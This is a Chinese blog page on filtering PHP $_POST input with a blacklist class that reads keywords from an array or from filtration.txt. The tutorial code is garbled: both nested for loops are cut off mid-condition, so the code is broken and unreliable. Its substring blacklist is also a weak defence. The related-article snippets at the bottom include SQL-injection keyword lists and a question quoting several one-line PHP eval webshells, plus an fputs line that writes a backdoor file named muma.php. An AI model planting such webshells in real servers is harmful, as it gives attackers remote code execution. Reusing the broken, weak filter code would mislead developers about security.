php post过滤,PHP过滤所有$_POST数据

最新推荐文章于 2023-11-14 14:59:00 发布
最新推荐文章于 2023-11-14 14:59:00 发布
阅读量1.5k 收藏
点赞数
文章标签: php post过滤

首先假设我们有个form表单,并且以POST的类型把数据提交到服务器,比如接收form表单数据的PHP页面

if(is_array($_POST)&&count($_POST)>0)

{

if((isset($_POST[“user”])&&!empty($_POST[“user”]))&&(isset($_POST[“password”])&&!empty($_POST[“password”])))

{

$i=$_POST[“user”];$o=$_POST[“password”]; //我们假设POST过来user和password两个参数,然后下面是作者写的小函数,可以在接收有POST的数据上增加

/***************调用开始*******************/

$login=array($i,$o,);//把POST的数据数组化,你有多少POST的数据要过滤就增加多少个.

require_once(“filtration.php”); //包含过滤文件

$filtration->filtration($login); ?//调用过滤函数,并且把数组传递给filtration的数组参数.

/***************调用结束*******************/

echo “无过滤字符号,成功登陆”; //过滤之后的响应方法

}

else

{

echo “请完整输出”;exit;

}

}

让我们来看看filtration.php的文件:

header(“Content-Type:text/html;charset=utf-8”);

error_reporting( E_ALL&~E_NOTICE ); //除去 E_NOTICE 之外的所有错误信息

class Filtration

{

private $str=array();//私有数组成员,用于接收POST的数组

function filtration($arrayfiltration=array()) //过滤函数,带一个数组变量$arrayfiltration,

{

$this->str=$arrayfiltration; //函数的$arrayfiltration数组接收POST的数组传值给私有数组$str

$str1=array(

‘过滤1′,’过滤2’,

‘过滤3′,’过滤4’,

‘过滤5′); //需要过滤的数值

$arraystr=count($this->str); //判断POST过来的数组有多少个元素

for($o=0;$o

{

for($i=0;$i

{

$j=substr_count($this->str[$o],$str1[$i]); //根据POST的数组元素数量执行$this->str和预定义的过滤数组$str1

/*

这比等于for一次循环是根据POST的元素数量来执行,POST多少个执行多少次

然后$o++表示执行的次数字+1,一直到等于POST的元素数量的时候中指。

然后,每执行一次$this->str[$o],调用一次POST过来的数组的数据,然后在进行for二次循环

对定义的过滤数组循环判断。直到所有的过滤数组都完成,跳出for二次循环

在判断一次循环的for条件(即POST的数组数量是否达),如果还有次数,对POST过来的数组的其他元素

以+1的方式,再一次进行二次for循环。直到一次循环完成。

*/

if($j>0) //只要有一条如果条件为真

{

echo “出现非法字符”;exit; //中止脚本。

}

}

}

}

}

$filtration=new Filtration(); //实例化对象。

?>

如果是用文件来过滤的话: 新增一个文件filtration.txt,写入要过滤的内容,以行为单位,然后PHP修改为:

header(“Content-Type:text/html;charset=utf-8”);

error_reporting( E_ALL&~E_NOTICE ); //除去 E_NOTICE 之外的所有错误信息

class Filtration

{

private $str=array();//私有数组成员,用于接收POST的数组

function filtration($arrayfiltration=array()) //过滤函数,带一个数组变量$arrayfiltration,

{

$this->str=$arrayfiltration; //函数的$arrayfiltration数组接收POST的数组传值给私有数组$str

$file=’filtration.txt’;//过滤文件

$openfile=file_get_contents($file); //执行打开文件并读入到字符串

$str1=explode(“\r\n”,$openfile); //获取数组”\r\n”表示是换行

$arraystr=count($this->str); //判断POST过来的数组有多少个元素

for($o=0;$o

{

for($i=0;$i

{

$j=substr_count($this->str[$o],$str1[$i]); //根据POST的数组元素数量执行$this->str和预定义的过滤数组$str1

if($j>0) //只要有一条如果条件为真

{

echo “出现非法字符”;exit; //中止脚本。

}

}

}

}

}

$filtration=new Filtration(); //实例化对象。

?>

如果是从文本读入,第一行请留空,否则第一行是无法过滤的.

如果是MYSQL里存放过滤数据的话,一样循环读入到数组

并且修改$str1的值=mysql里获取的数组数据.就可以进行判断了.

weixin_39946364
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php中$_GET与$_POST过滤sql注入的方法
10-25
主要介绍了php中$_GET与$_POST过滤sql注入的方法,包含了addslashes_deep函数与数组的操作方法,是非常具有实用价值的技巧,需要的朋友可以参考下
PHP利用超级全局变量$_POST来接收表单数据的实例
12-18
- `$_REQUEST`:包含了`$_GET`, `$_POST`和`$_COOKIE`中的所有数据,应当谨慎使用,因为它可能引入安全风险。 - `$_SERVER`:包含了服务器和环境信息,如PHP_SELF用于获取当前执行脚本的文件名。 - `$GLOBALS`:访问...
php输入post过滤函数,入库出库,显示
tongluren381的博客
08-23 1112
防注入,php安全,接收数据过滤
php输入post过滤函数
wwppp987的博客
07-25 878
function GLOBAL_POST($str) { $str_origin=$str; if (empty($str)) return false; $str = str_replace( '/', "", $str);//替换关键词 $str = str_replace("\\", "", $str); $str = str_replace(">", "", $st...
php post过滤,php POST GET 数据过滤函数
weixin_39897505的博客
03-10 278
foreach(array('_GET','_POST') as $_request) {foreach($$_request as $_key => $_value) {if ($_key{0} != '_') {if (IS_GPC) {$_value = s_array($_value);}$$_key = $_value;}}}function s_array(&$array...
php自动post系统,php自动过滤POST,GET传参
weixin_39935777的博客
03-11 299
作者:LAMP小白点击:3651发布日期:2012-10-12 00:39:00返回列表首先判断是否自动过滤//加载MioDefenderif(mioCfg_MioDefender)Miodefender::init(mioCfg_MioDefenderInit);安全类代码 配合去html标签就更好了 这里只是基本的实现mio_lt;?phpclass Miodefender{sta...
php post 过滤,ThinkPHP技巧-POST过滤
weixin_29309475的博客
03-10 990
下面文章介绍了如下几个问题的解决方法仅供参考:问题:1. 表单 post 重复提交?2.限制 post 模拟提交?3.数据 add() 自增id出现奇数偶数?1.如何解决表单 post 重复提交?a.页面提交后转到另一个页面而不是本页面,举个栗子,比如你的页面地址为http://yourdomain.com/User/Index/login则该页面的表单action地址可以为另外的处理地址,如这样...
php中$_REQUEST、$_POST、$_GET的区别和联系小结
10-28
首先,$_REQUEST是一个包含了$_GET、$_POST和$_COOKIE数组的数组,它能够访问到通过GET、POST和Cookie方法传递的所有数据。但是,使用$_REQUEST会有一个弊端,那就是它的执行速度较慢。在某些情况下,尤其当页面中不...
php 数据过滤
weixin_34124939的博客
11-28 149
在对用户输入数据进行过滤时通常都是自己写方法进行判断比如验证邮箱的时候使用正则表达式 $pattern = "/\w+([-+.']\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*/"; if (!preg_match($pattern, $email)) { throw new \Exception(self::ERROR_PARAMETER_EMPTY . '_邮件格式有...
php 批量过滤post,get敏感数据
最新发布
qq_39160867的博客
11-14 129
【代码】php 批量过滤post,get敏感数据
php post和get过滤类,php中$_GET与$_POST过滤sql注入的方法_PHP
weixin_29290947的博客
04-01 326
本文实例讲述了php中$_GET与$_POST过滤sql注入的方法,分享给大家供大家参考。具体分析如下:此函数只能过滤一些敏感的sql命令了,像id=1这种大家还是需要自己简单过滤了。主要实现代码如下:代码如下:if (!get_magic_quotes_gpc()){if (!empty($_GET)){$_GET = addslashes_deep($_GET);}if (!empty($_...
用户注册
zhaoxinglei0309的专栏
10-19 443
从表单接受到$_POST[‘*’] 该信息内容可能包括  “ ‘   空格 特殊符号  例如   “ user‘’‘’abc”         $_POST[‘pass’] =” “” and  (select * from tbl_usr)” 防注入(攻击)   PHP安全问题: 1、  注入 SQL   在用户执行注册过程中口令内容部分使用了类似 (select insert
PHP过滤POST,GET敏感数据
Feebas
11-23 2026
该博文移植到:http://www.gulianqiang.com/php/165.html
PHP 过滤 $_POST 或 $_GET 接收的参数
monster
06-10 3679
话不多说 先放代码讲一讲博主为什么要做这个: /************************* 说明: 判断传递的变量中是否含有非法字符 如$_POST、$_GET 功能: 防注入 *************************/ //你想要过滤的非法字符 $ArrFiltrate=array("'","or","and","union","where","&","j...
php post过滤,php过滤get和post的注入函数,记录攻击日志
weixin_39815600的博客
03-10 248
function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq){if(is_array($StrFiltValue)){$StrFiltValue=implode($StrFiltValue);}if (preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1){slog("操作IP: ".$_SER...
php post 过滤,PHP怎么过滤post提交数据中的空格
weixin_35118064的博客
03-10 692
本篇文章主要给大家介绍PHP如何将post提交过来的数据进行空格过滤。大家应该都知道,我们在开发登录界面时,除了前台的一些js验证,还有一些提交数据到后台后的验证。那么关于登录界面form表单提交的前台验证方法,在这两篇文章【jQuery表单验证提交:前台验证一】【jQuery表单验证提交:前台验证二】中也给大家进行相关的介绍了,需要的朋友可以选择参考。下面我就通过简单的代码示例,给大家介绍php...
<?php @eval($_POST['pass']);?> <?php @eval($_POST['attack']);?> <?php @eval($_POST['attack']);?> <?php @eval($_POST['attack']);?> <?php @eval($_POST['attack']);?> <?php @eval($_POST['attack']);?> <?php @eval($_POST['hack']);?>和<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST[hack]);?>'); ?>中的hack为什么一个加单引号,一个不加单引号
07-16
这样做是为了确保 `$_POST['hack']` 中的内容被视为字符串而不是其他类型的数据。而在第二行代码中,`$_POST[hack]` 没有使用单引号,这是因为它被视为一个常量而不是变量。在这种情况下,如果不存在名为 `hack` 的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值